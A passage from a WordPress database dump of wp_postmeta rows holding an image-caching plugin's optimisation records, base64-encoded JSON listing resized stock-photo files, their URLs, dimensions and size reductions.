UsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0NTEsInRpbWUiOjE0ODM1NDkwMTksImlkIjoyMzEzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMTk3MjYwMTktNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzE5NzI2MDE5LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMxOTcyNjAxOS01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6OTIxLCJ0aW1lIjoxNDgzNTQ5MDIyLCJpZCI6MjMxM31d'); 
INSERT INTO `wp_postmeta` VALUES (28848, 2309, 'wpfc_optimisation_reduction', '7879'); 
INSERT INTO `wp_postmeta` VALUES (28849, 2309, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTIuanBnIiwid2lkdGgiOjM4MzYsImhlaWdodCI6MjU1NywibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTAyNywiaWQiOiIyMzA5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY2MiwidGltZSI6MTQ4MzU0OTAzMCwiaWQiOjIzMDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMDA1LCJ0aW1lIjoxNDgzNTQ5MDM0LCJpZCI6MjMwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEwMzAsInRpbWUiOjE0ODM1NDkwMzgsImlkIjoyMzA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyNzI1LCJ0aW1lIjoxNDgzNTQ5MDQzLCJpZCI6MjMwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYxNSwidGltZSI6MTQ4MzU0OTA0NiwiaWQiOjIzMDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NzAsInRpbWUiOjE0ODM1NDkwNDksImlkIjoyMzA5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTUyLCJ0aW1lIjoxNDgzNTQ5MDUzLCJpZCI6MjMwOX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzczNDUxNDUyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM3MzQ1MTQ1Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNzM0NTE0NTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjgyMCwidGltZSI6MTQ4MzU0OTA1NywiaWQiOjIzMDl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28850, 2306, 'wpfc_optimisation_reduction', '8918'); 
INSERT INTO `wp_postmeta` VALUES (28851, 2306, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYuanBnIiwid2lkdGgiOjU0NzIsImhlaWdodCI6MzY0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTA2MSwiaWQiOiIyMzA2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY0MiwidGltZSI6MTQ4MzU0OTA2NSwiaWQiOjIzMDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxMjIzLCJ0aW1lIjoxNDgzNTQ5MDY5LCJpZCI6MjMwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjExOTYsInRpbWUiOjE0ODM1NDkwNzMsImlkIjoyMzA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjozMzQ2LCJ0aW1lIjoxNDgzNTQ5MDc4LCJpZCI6MjMwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU1MywidGltZSI6MTQ4MzU0OTA4MSwiaWQiOjIzMDZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MTUsInRpbWUiOjE0ODM1NDkwODUsImlkIjoyMzA2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTU2LCJ0aW1lIjoxNDgzNTQ5MDg4LCJpZCI6MjMwNn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDgxNDQ5NjE2LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ4MTQ0OTYxNi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180ODE0NDk2MTYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjg4NywidGltZSI6MTQ4MzU0OTA5MiwiaWQiOjIzMDZ9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28852, 2303, 'wpfc_optimisation_reduction', '7805'); 
INSERT INTO `wp_postmeta` VALUES (28853, 2303, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTguanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6NDAwNCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0OTA5NywiaWQiOiIyMzAzIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjU0NiwidGltZSI6MTQ4MzU0OTEwMCwiaWQiOjIzMDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjo5NTcsInRpbWUiOjE0ODM1NDkxMDQsImlkIjoyMzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtNzY4eDUxMy5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTc2OHg1MTMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC03Njh4NTEzLmpwZyIsInJlZHVjdGlvbiI6OTg0LCJ0aW1lIjoxNDgzNTQ5MTA4LCJpZCI6MjMwM30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTE2MDB4MTA2OC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtMTYwMHgxMDY4LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtMTYwMHgxMDY4LmpwZyIsInJlZHVjdGlvbiI6MzAxOSwidGltZSI6MTQ4MzU0OTExMywiaWQiOjIzMDN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzMzNjMyOTg1OC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zMzYzMjk4NTgtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzM2MzI5ODU4LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo1NDcsInRpbWUiOjE0ODM1NDkxMTYsImlkIjoyMzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX